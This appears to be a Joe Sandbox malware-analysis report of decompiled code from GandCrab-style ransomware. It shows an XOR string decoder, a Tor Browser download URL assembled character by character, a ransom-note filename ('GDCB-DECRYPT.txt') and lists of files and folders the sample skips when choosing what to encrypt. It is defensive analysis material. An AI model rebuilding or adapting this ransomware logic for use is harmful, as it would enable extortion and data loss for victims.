					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xf1e2000) =  *(_t62 + 0xf1e2000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xf1e2a64 = 0xf1e2000;
				_t94 = E0F1D8090(0xf1e2000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xf1e2a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4);
						 *0xf1e2a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000);
					_t54 = E0F1D7C10( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xf1e2000;
					_t69 =  *0xf1e2000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xf1e2000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}

0x0f1d40f5
0x0f1d43c8
0x0f1d43cd
0x0f1d43cd
0x0f1d40fb
0x0f1d40fc
0x0f1d40fe
0x0f1d40ff
0x0f1d4104
0x0f1d4106
0x0f1d4107
0x0f1d4109
0x0f1d410a
0x0f1d410c
0x0f1d410d
0x0f1d410f
0x0f1d4110
0x0f1d4115
0x0f1d4117
0x0f1d4118
0x0f1d4121
0x0f1d412d
0x0f1d413e
0x0f1d4147
0x0f1d4151
0x0f1d4157
0x0f1d4160
0x0f1d4171
0x0f1d416d
0x0f1d416d
0x0f1d416d
0x0f1d417b
0x0f1d4187
0x0f1d4193
0x0f1d4199
0x0f1d41a1
0x0f1d41a6
0x0f1d41ab
0x0f1d41ae
0x0f1d41b3
0x0f1d41c0
0x0f1d41c0
0x0f1d41c0
0x0f1d41c3
0x0f1d41c8
0x0f1d41cc
0x0f1d41d1
0x0f1d41d1
0x0f1d41e0
0x0f1d41e0
0x0f1d41e7
0x0f1d41e8
0x0f1d41f4
0x0f1d4208
0x0f1d420c
0x0f1d4286
0x0f1d428d
0x0f1d4295
0x0f1d429d
0x0f1d42a5
0x0f1d42ad
0x0f1d42b5
0x0f1d42bd
0x0f1d42c5
0x0f1d42cd
0x0f1d42d5
0x0f1d42dd
0x0f1d42e5
0x0f1d42ed
0x0f1d42f5
0x0f1d42fd
0x0f1d4305
0x0f1d430d
0x0f1d4315
0x0f1d431d
0x0f1d4325
0x0f1d432d
0x0f1d4335
0x0f1d433d
0x0f1d4345
0x0f1d434d
0x0f1d4355
0x0f1d435d
0x0f1d4365
0x0f1d436d
0x0f1d4375
0x0f1d4385
0x0f1d438b
0x0f1d4392
0x0f1d439f
0x0f1d43a5
0x0f1d4392
0x0f1d43b6
0x0f1d43c3
0x00000000
0x0f1d43c3
0x0f1d4210
0x0f1d4210
0x0f1d4212
0x0f1d4224
0x0f1d4228
0x0f1d422d
0x0f1d4236
0x00000000
0x00000000
0x0f1d423a
0x0f1d423d
0x0f1d4243
0x0f1d4243
0x0f1d424b
0x00000000
0x00000000
0x0f1d4250
0x0f1d4250
0x0f1d4256
0x00000000
0x00000000
0x0f1d4260
0x0f1d4262
0x0f1d426d
0x0f1d4271
0x00000000
0x00000000
0x00000000
0x0f1d4271
0x0f1d4264
0x0f1d426b
0x00000000
0x00000000
0x00000000
0x0f1d426b
0x0f1d43ce
0x00000000
0x0f1d4277
0x0f1d4277
0x0f1d4277
0x0f1d427b
0x0f1d427e
0x0f1d4281
0x00000000
0x0f1d4243
0x00000000

APIs

Part of subcall function 0F1D39F0: GetProcessHeap.KERNEL32(?,?,0F1D4637,00000000,?,00000000,00000000), ref: 0F1D3A8C

Part of subcall function 0F1D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F1D7357
Part of subcall function 0F1D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F1D7368
Part of subcall function 0F1D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F1D7386
Part of subcall function 0F1D7330: GetComputerNameW.KERNEL32 ref: 0F1D7390
Part of subcall function 0F1D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F1D73B0
Part of subcall function 0F1D7330: wsprintfW.USER32 ref: 0F1D73F1
Part of subcall function 0F1D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F1D740E
Part of subcall function 0F1D7330: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F1D7432
Part of subcall function 0F1D7330: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F1D4640,?), ref: 0F1D7456
Part of subcall function 0F1D7330: RegCloseKey.KERNEL32(00000000), ref: 0F1D7472

Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7192
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D719D
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71B3
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71BE
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71D4
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71DF
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D71F5
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(0F1D4966,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7200
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7216
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7221
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7237
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7242
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D7261
Part of subcall function 0F1D7140: lstrlenW.KERNEL32(?,?,?,?,0F1D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F1D726C

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D4151
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D4193
lstrcpyW.KERNEL32 ref: 0F1D4212
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D4219

Strings

c, xrefs: 0F1D42DD
ransom_id=, xrefs: 0F1D4180, 0F1D418C
r, xrefs: 0F1D42ED
o, xrefs: 0F1D430D
/, xrefs: 0F1D42A5
w, xrefs: 0F1D4325
h, xrefs: 0F1D428D
a, xrefs: 0F1D4335
d, xrefs: 0F1D431D
t, xrefs: 0F1D42BD
., xrefs: 0F1D42E5
s, xrefs: 0F1D429D
a, xrefs: 0F1D4345
d, xrefs: 0F1D4315
r, xrefs: 0F1D42CD
-, xrefs: 0F1D433D
l, xrefs: 0F1D432D
{USERID}, xrefs: 0F1D41EF, 0F1D423D, 0F1D4243
h, xrefs: 0F1D4355
., xrefs: 0F1D4365
m, xrefs: 0F1D435D
y, xrefs: 0F1D434D
r, xrefs: 0F1D42C5
/, xrefs: 0F1D42F5
n, xrefs: 0F1D436D
o, xrefs: 0F1D42FD
w, xrefs: 0F1D42B5
t, xrefs: 0F1D4295
w, xrefs: 0F1D42AD
j, xrefs: 0F1D42D5
n, xrefs: 0F1D4305

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
API String ID: 4100118565-2385900546
Opcode ID: db3a0164d08f8c3e0ca379f5624b9381ce212ddb91edff793926eeace89c0741
Instruction ID: ce13346143c6f456140647ad10a0b593b56c350e1459bef5ac37f7a542b45bf8
Opcode Fuzzy Hash: db3a0164d08f8c3e0ca379f5624b9381ce212ddb91edff793926eeace89c0741
Instruction Fuzzy Hash: 767114705043409BE724DF10D819B6B7BF6FF80754F504A1CF6851B292DBFAA6A8CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D41D6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F1D41D6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xf1e2000) =  *(_t41 + 0xf1e2000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xf1e2a64 = 0xf1e2000;
				_t60 = E0F1D8090(0xf1e2000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xf1e2000;
						_t49 =  *0xf1e2000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xf1e2000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xf1e2a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4);
					 *0xf1e2a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000);
				_t44 = E0F1D7C10( &_a136);
				return _t44;
			}

0x0f1d41d6
0x0f1d41e0
0x0f1d41e0
0x0f1d41e7
0x0f1d41e8
0x0f1d41f4
0x0f1d4208
0x0f1d420c
0x0f1d4210
0x0f1d4210
0x0f1d4212
0x0f1d4224
0x0f1d4228
0x0f1d422d
0x0f1d4236
0x00000000
0x00000000
0x0f1d423a
0x0f1d423d
0x0f1d4243
0x0f1d4243
0x0f1d424b
0x00000000
0x0f1d4250
0x0f1d4250
0x0f1d4250
0x0f1d4256
0x00000000
0x00000000
0x0f1d4260
0x0f1d4262
0x0f1d426d
0x0f1d4271
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d4264
0x0f1d4264
0x0f1d426b
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d426b
0x00000000
0x0f1d4262
0x0f1d43ce
0x00000000
0x0f1d43ce
0x00000000
0x0f1d4277
0x0f1d4277
0x0f1d4277
0x0f1d427b
0x0f1d427e
0x0f1d4281
0x00000000
0x0f1d4243
0x0f1d4210
0x0f1d4286
0x0f1d428d
0x0f1d4295
0x0f1d429d
0x0f1d42a5
0x0f1d42ad
0x0f1d42b5
0x0f1d42bd
0x0f1d42c5
0x0f1d42cd
0x0f1d42d5
0x0f1d42dd
0x0f1d42e5
0x0f1d42ed
0x0f1d42f5
0x0f1d42fd
0x0f1d4305
0x0f1d430d
0x0f1d4315
0x0f1d431d
0x0f1d4325
0x0f1d432d
0x0f1d4335
0x0f1d433d
0x0f1d4345
0x0f1d434d
0x0f1d4355
0x0f1d435d
0x0f1d4365
0x0f1d436d
0x0f1d4375
0x0f1d4385
0x0f1d438b
0x0f1d4392
0x0f1d439f
0x0f1d43a5
0x0f1d4392
0x0f1d43b6
0x0f1d43c3
0x0f1d43cd

APIs

lstrcpyW.KERNEL32 ref: 0F1D4212
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D4219
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F1D4385
wsprintfW.USER32 ref: 0F1D439F
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F1D43B6

Strings

c, xrefs: 0F1D42DD
r, xrefs: 0F1D42ED
o, xrefs: 0F1D430D
/, xrefs: 0F1D42A5
w, xrefs: 0F1D4325
h, xrefs: 0F1D428D
a, xrefs: 0F1D4335
d, xrefs: 0F1D431D
t, xrefs: 0F1D42BD
., xrefs: 0F1D42E5
s, xrefs: 0F1D429D
a, xrefs: 0F1D4345
d, xrefs: 0F1D4315
r, xrefs: 0F1D42CD
-, xrefs: 0F1D433D
l, xrefs: 0F1D432D
{USERID}, xrefs: 0F1D41EF, 0F1D423D, 0F1D4243
h, xrefs: 0F1D4355
., xrefs: 0F1D4365
m, xrefs: 0F1D435D
y, xrefs: 0F1D434D
r, xrefs: 0F1D42C5
/, xrefs: 0F1D42F5
n, xrefs: 0F1D436D
o, xrefs: 0F1D42FD
w, xrefs: 0F1D42B5
t, xrefs: 0F1D4295
w, xrefs: 0F1D42AD
j, xrefs: 0F1D42D5
n, xrefs: 0F1D4305

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
API String ID: 4033391921-3341315666
Opcode ID: a6ab566a51f379c4e5aa1a6f4c8f3fa6a4dfefdb7cf381d6b42ce10e8ff0f3f3
Instruction ID: 598cf785aafe1fa045d16c51aa0dadddfd669c8afa3737e84735738392d44b70
Opcode Fuzzy Hash: a6ab566a51f379c4e5aa1a6f4c8f3fa6a4dfefdb7cf381d6b42ce10e8ff0f3f3
Instruction Fuzzy Hash: 12419A70509390CBE720DF00D51876ABFF2FB80759F44891CF6880B292D7FA95A9CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D6790 Relevance: 31.6, APIs: 11, Strings: 10, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0F1D6790(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

0x0f1d6799
0x0f1d679c
0x0f1d67a1
0x0f1d67a3
0x0f1d67a6
0x0f1d67a9
0x0f1d67aa
0x0f1d67b0
0x0f1d67b0
0x0f1d67b3
0x0f1d67b4
0x0f1d67b0
0x0f1d67c4
0x0f1d67d1
0x0f1d67e6
0x00000000
0x0f1d6830
0x0f1d6836
0x0f1d683b
0x0f1d6840
0x0f1d6840
0x0f1d67d5
0x0f1d67d5
0x0f1d67db
0x0f1d67db

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0F1D69A3), ref: 0F1D679C
lstrlenW.KERNEL32(00000000), ref: 0F1D67A1
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0F1D67CD
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0F1D67E2
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0F1D67EE
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0F1D67FA
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0F1D6806
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0F1D6812
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0F1D681E
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0F1D682A
lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 0F1D6836

Strings

thumbs.db, xrefs: 0F1D6824
bootsect.bak, xrefs: 0F1D6800
boot.ini, xrefs: 0F1D680C
GDCB-DECRYPT.txt, xrefs: 0F1D6830
desktop.ini, xrefs: 0F1D67C7
ntuser.dat.log, xrefs: 0F1D6818
i)w, xrefs: 0F1D67BE
iconcache.db, xrefs: 0F1D67F4
ntuser.dat, xrefs: 0F1D67E8
autorun.inf, xrefs: 0F1D67DC

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: i)w$GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-3812678309
Opcode ID: 59aeadc630cd26f5ae1492722234c46e05cd39e80e816acd5b9c6806c0301d18
Instruction ID: 0d154103de924a5b67a2ee4b514ad9e9c4fd5d13bf55b193844408c712320f9f
Opcode Fuzzy Hash: 59aeadc630cd26f5ae1492722234c46e05cd39e80e816acd5b9c6806c0301d18
Instruction Fuzzy Hash: 8511E56330173EA59A20367D9C81EEF12BD8DD29A0B460625F901E2443EF85E73388F6

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D6640 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0F1D6640(void* __ecx) {
				void* _t10;
				intOrPtr* _t21;
				void* _t45;
				void* _t46;

				_t46 = __ecx;
				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0F1D8090(_t46, L"\\ProgramData\\") != 0 || E0F1D8090(_t46, L"\\Program Files\\") != 0 || E0F1D8090(_t46, L"\\Tor Browser\\") != 0 || E0F1D8090(_t46, L"Ransomware") != 0 || E0F1D8090(_t46, L"\\All Users\\") != 0 || E0F1D8090(_t46, L"\\Local Settings\\") != 0) {
					L16:
					VirtualFree(_t45, 0, 0x8000);
					return 0;
				} else {
					_t10 = E0F1D8090(_t46, L":\\Windows\\");
					if(_t10 != 0) {
						goto L16;
					} else {
						_t21 = __imp__SHGetSpecialFolderPathW;
						_push(_t10);
						_push(0x2a);
						_push(_t45);
						_push(_t10);
						if( *_t21() == 0 || E0F1D8090(_t46, _t45) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t45);
							_push(0);
							if( *_t21() == 0 || E0F1D8090(_t46, _t45) == 0) {
								_push(0);
								_push(0x24);
								_push(_t45);
								_push(0);
								if( *_t21() == 0 || E0F1D8090(_t46, _t45) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t45);
									_push(0);
									if( *_t21() == 0 || E0F1D8090(_t46, _t45) == 0) {
										VirtualFree(_t45, 0, 0x8000);
										return 1;
									} else {
										goto L16;
									}
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
						} else {
							goto L16;
						}
					}
				}
			}

0x0f1d6651
0x0f1d6660
0x0f1d6669
0x0f1d676c
0x0f1d6775
0x0f1d6780
0x0f1d66d3
0x0f1d66da
0x0f1d66e1
0x00000000
0x0f1d66e7
0x0f1d66e7
0x0f1d66ed
0x0f1d66ee
0x0f1d66f0
0x0f1d66f1
0x0f1d66f6
0x0f1d6705
0x0f1d6707
0x0f1d6709
0x0f1d670a
0x0f1d6710
0x0f1d671f
0x0f1d6721
0x0f1d6723
0x0f1d6724
0x0f1d672a
0x0f1d6739
0x0f1d673b
0x0f1d673d
0x0f1d673e
0x0f1d6744
0x0f1d6760
0x0f1d676b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0f1d66f6
0x0f1d66e1

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D6653
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D66F2
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D670C
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D6726
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D6740
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D6760
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F1D6CA6,00000000,?,?), ref: 0F1D6775

Strings

Ransomware, xrefs: 0F1D6697
\Tor Browser\, xrefs: 0F1D6683
\All Users\, xrefs: 0F1D66AB
\ProgramData\, xrefs: 0F1D6659
:\Windows\, xrefs: 0F1D66D3
\Program Files\, xrefs: 0F1D666F
\Local Settings\, xrefs: 0F1D66BF

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: :\Windows\$Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
API String ID: 1363212851-2358141795
Opcode ID: 2b4d593a8063c0408fb710bac0a23915f6cc551e6b53f51a06349a6fc5e7ad1e
Instruction ID: 9627c6688e59749e8b571709ebcc5637244646bbd5707d656fdfbac8719b0065
Opcode Fuzzy Hash: 2b4d593a8063c0408fb710bac0a23915f6cc551e6b53f51a06349a6fc5e7ad1e
Instruction Fuzzy Hash: FD31F42434072523FA6031B65E65B6F757E8FC1E61F548015BB01EE2C3FF99ED228299

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D7140 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0F1D7140(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
